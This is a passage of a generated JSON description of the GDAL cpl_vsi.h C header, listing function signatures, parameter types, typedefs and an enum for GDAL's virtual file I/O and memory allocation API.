":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":pointer", "type": { "tag": "FILE" } } }, { "tag": "function", "name": "VSIFClose", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:86:17", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": "FILE" } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "VSIFSeek", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:87:17", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": "FILE" } } }, { "tag": "parameter", "name": "", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "VSIFTell", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:88:17", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": "FILE" } } }], "return-type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "VSIRewind", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:89:17", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": "FILE" } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "VSIFFlush", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:90:17", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": "FILE" } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "VSIFRead", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:92:17", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "", "type": { "tag": "size_t" } }, { "tag": "parameter", "name": "", "type": { "tag": "size_t" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": "FILE" } } }], "return-type": { "tag": "size_t" } }, { "tag": "function", "name": "VSIFWrite", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:93:17", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "", "type": { "tag": "size_t" } }, { "tag": "parameter", "name": "", "type": { "tag": "size_t" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": "FILE" } } }], "return-type": { "tag": "size_t" } }, { "tag": "function", "name": "VSIFGets", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:94:17", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": "FILE" } } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "VSIFPuts", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:95:17", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": "FILE" } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "VSIFPrintf", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:96:17", "variadic": true, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": "FILE" } } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "VSIFGetc", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:98:17", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": "FILE" } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "VSIFPutc", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:99:17", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": "FILE" } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "VSIUngetc", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:100:17", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": "FILE" } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "VSIFEof", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:101:17", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": "FILE" } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "typedef", "ns": 0, "name": "VSIStatBuf", "location": "/usr/include/gdal/cpl_vsi.h:110:21", "type": { "tag": ":struct", "name": "stat", "id": 55 } }, { "tag": "function", "name": "VSIStat", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:111:13", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": "VSIStatBuf" } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "typedef", "ns": 0, "name": "vsi_l_offset", "location": "/usr/include/gdal/cpl_vsi.h:140:18", "type": { "tag": "GUIntBig" } }, { "tag": "typedef", "ns": 0, "name": "VSILFILE", "location": "/usr/include/gdal/cpl_vsi.h:156:14", "type": { "tag": "FILE" } }, { "tag": "function", "name": "VSIFOpenL", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:159:21", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":pointer", "type": { "tag": "VSILFILE" } } }, { "tag": "function", "name": "VSIFOpenExL", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:160:21", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":pointer", "type": { "tag": "VSILFILE" } } }, { "tag": "function", "name": "VSIFCloseL", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:161:17", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": "VSILFILE" } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "VSIFSeekL", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:162:17", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": "VSILFILE" } } }, { "tag": "parameter", "name": "", "type": { "tag": "vsi_l_offset" } }, { "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "VSIFTellL", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:163:22", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": "VSILFILE" } } }], "return-type": { "tag": "vsi_l_offset" } }, { "tag": "function", "name": "VSIRewindL", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:164:17", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": "VSILFILE" } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "VSIFReadL", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:165:17", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "", "type": { "tag": "size_t" } }, { "tag": "parameter", "name": "", "type": { "tag": "size_t" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": "VSILFILE" } } }], "return-type": { "tag": "size_t" } }, { "tag": "function", "name": "VSIFReadMultiRangeL", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:166:17", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "nRanges", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "ppData", "type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": ":void" } } } }, { "tag": "parameter", "name": "panOffsets", "type": { "tag": ":pointer", "type": { "tag": "vsi_l_offset" } } }, { "tag": "parameter", "name": "panSizes", "type": { "tag": ":pointer", "type": { "tag": "size_t" } } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": "VSILFILE" } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "VSIFWriteL", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:167:17", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "", "type": { "tag": "size_t" } }, { "tag": "parameter", "name": "", "type": { "tag": "size_t" } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": "VSILFILE" } } }], "return-type": { "tag": "size_t" } }, { "tag": "function", "name": "VSIFEofL", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:168:17", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": "VSILFILE" } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "VSIFTruncateL", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:169:17", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": "VSILFILE" } } }, { "tag": "parameter", "name": "", "type": { "tag": "vsi_l_offset" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "VSIFFlushL", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:170:17", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": "VSILFILE" } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "VSIFPrintfL", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:171:17", "variadic": true, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": "VSILFILE" } } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "VSIFPutcL", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:172:17", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": "VSILFILE" } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "enum", "ns": 0, "name": "", "id": 56, "location": "/usr/include/gdal/cpl_vsi.h:175:9", "fields": [{ "tag": "field", "name": "VSI_RANGE_STATUS_UNKNOWN", "value": 0 }, { "tag": "field", "name": "VSI_RANGE_STATUS_DATA", "value": 1 }, { "tag": "field", "name": "VSI_RANGE_STATUS_HOLE", "value": 2 }] }, { "tag": "typedef", "ns": 0, "name": "VSIRangeStatus", "location": "/usr/include/gdal/cpl_vsi.h:180:3", "type": { "tag": ":enum", "name": "", "id": 56 } }, { "tag": "function", "name": "VSIFGetRangeStatusL", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:182:24", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "fp", "type": { "tag": ":pointer", "type": { "tag": "VSILFILE" } } }, { "tag": "parameter", "name": "nStart", "type": { "tag": "vsi_l_offset" } }, { "tag": "parameter", "name": "nLength", "type": { "tag": "vsi_l_offset" } }], "return-type": { "tag": "VSIRangeStatus" } }, { "tag": "function", "name": "VSIIngestFile", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:184:17", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "fp", "type": { "tag": ":pointer", "type": { "tag": "VSILFILE" } } }, { "tag": "parameter", "name": "pszFilename", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "ppabyRet", "type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": "GByte" } } } }, { "tag": "parameter", "name": "pnSize", "type": { "tag": ":pointer", "type": { "tag": "vsi_l_offset" } } }, { "tag": "parameter", "name": "nMaxSize", "type": { "tag": "GIntBig" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "VSIOverwriteFile", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:190:17", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "fpTarget", "type": { "tag": ":pointer", "type": { "tag": "VSILFILE" } } }, { "tag": "parameter", "name": "pszSourceFilename", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "struct", "ns": 0, "name": "stat64", "id": 0, "location": "/usr/include/gdal/cpl_vsi.h:194:16 <Spelling=/usr/include/gdal/cpl_config.h:341:22>", "bit-size": 0, "bit-alignment": 0, "fields": [] }, { "tag": "typedef", "ns": 0, "name": "VSIStatBufL", "location": "/usr/include/gdal/cpl_vsi.h:194:29", "type": { "tag": "struct", "ns": 0, "name": "stat64", "id": 0, "location": "/usr/include/gdal/cpl_vsi.h:194:16 <Spelling=/usr/include/gdal/cpl_config.h:341:22>", "bit-size": 0, "bit-alignment": 0, "fields": [] } }, { "tag": "function", "name": "VSIStatL", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:200:17", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": "VSIStatBufL" } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "VSIStatExL", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:211:17", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "pszFilename", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "psStatBuf", "type": { "tag": ":pointer", "type": { "tag": "VSIStatBufL" } } }, { "tag": "parameter", "name": "nFlags", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "VSIIsCaseSensitiveFS", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:213:17", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "pszFilename", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "VSISupportsSparseFiles", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:215:17", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "pszPath", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "VSIHasOptimizedReadMultiRange", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:217:17", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "pszPath", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "VSIGetActualURL", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:219:21", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "pszFilename", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "VSIGetSignedURL", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:221:15", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "pszFilename", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "papszOptions", "type": { "tag": "CSLConstList" } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "VSIGetFileSystemOptions", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:223:21", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "pszFilename", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "VSIGetFileSystemsPrefixes", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:225:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [], "return-type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } } }, { "tag": "function", "name": "VSIFGetNativeFileDescriptorL", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:227:17", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": "VSILFILE" } } }], "return-type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "function", "name": "VSICalloc", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:233:17", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "size_t" } }, { "tag": "parameter", "name": "", "type": { "tag": "size_t" } }], "return-type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "function", "name": "VSIMalloc", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:234:17", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": "size_t" } }], "return-type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "function", "name": "VSIFree", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:235:17", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "VSIRealloc", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:236:17", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "", "type": { "tag": "size_t" } }], "return-type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "function", "name": "VSIStrdup", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:237:17", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "VSIMallocAligned", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:239:17", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "nAlignment", "type": { "tag": "size_t" } }, { "tag": "parameter", "name": "nSize", "type": { "tag": "size_t" } }], "return-type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "function", "name": "VSIMallocAlignedAuto", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:240:17", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "nSize", "type": { "tag": "size_t" } }], "return-type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "function", "name": "VSIFreeAligned", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:241:17", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "ptr", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "VSIMallocAlignedAutoVerbose", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:243:17", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "nSize", "type": { "tag": "size_t" } }, { "tag": "parameter", "name": "pszFile", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "nLine", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "function", "name": "VSIMalloc2", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:254:15", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "nSize1", "type": { "tag": "size_t" } }, { "tag": "parameter", "name": "nSize2", "type": { "tag": "size_t" } }], "return-type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "function", "name": "VSIMalloc3", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:263:15", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "nSize1", "type": { "tag": "size_t" } }, { "tag": "parameter", "name": "nSize2", "type": { "tag": "size_t" } }, { "tag": "parameter", "name": "nSize3", "type": { "tag": "size_t" } }], "return-type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "function", "name": "VSIMallocVerbose", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:266:17", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "nSize", "type": { "tag": "size_t" } }, { "tag": "parameter", "name": "pszFile", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "nLine", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "function", "name": "VSIMalloc2Verbose", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:271:17", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "nSize1", "type": { "tag": "size_t" } }, { "tag": "parameter", "name": "nSize2", "type": { "tag": "size_t" } }, { "tag": "parameter", "name": "pszFile", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "nLine", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "function", "name": "VSIMalloc3Verbose", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:276:17", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "nSize1", "type": { "tag": "size_t" } }, { "tag": "parameter", "name": "nSize2", "type": { "tag": "size_t" } }, { "tag": "parameter", "name": "nSize3", "type": { "tag": "size_t" } }, { "tag": "parameter", "name": "pszFile", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "nLine", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "function", "name": "VSICallocVerbose", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:281:17", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "nCount", "type": { "tag": "size_t" } }, { "tag": "parameter", "name": "nSize", "type": { "tag": "size_t" } }, { "tag": "parameter", "name": "pszFile", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "nLine", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "function", "name": "VSIReallocVerbose", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:286:17", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "pOldPtr", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "nNewSize", "type": { "tag": "size_t" } }, { "tag": "parameter", "name": "pszFile", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "nLine", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "function", "name": "VSIStrdupVerbose", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:291:17", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "pszStr", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "pszFile", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "parameter", "name": "nLine", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "function", "name": "CPLGetPhysicalRAM", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:295:17", "variadic": false, "inline": false, "storage-class": "none", "parameters": [], "return-type": { "tag": "GIntBig" } }, { "tag": "function", "name": "CPLGetUsablePhysicalRAM", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:296:17", "variadic": false, "inline": false, "storage-class": "none", "parameters": [], "return-type": { "tag": "GIntBig" } }, { "tag": "function", "name": "VSIReadDir", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:304:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } } }, { "tag": "function", "name": "VSIReadDirRecursive", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:305:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "pszPath", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }], "return-type": { "tag": ":pointer", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } } }, { "tag": "function", "name": "VSIReadDirEx", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:306:16", "variadic": false, "inline": false, "storage-class": "none", "parameters": [{ "tag": "parameter", "name": "pszPath", "type": { 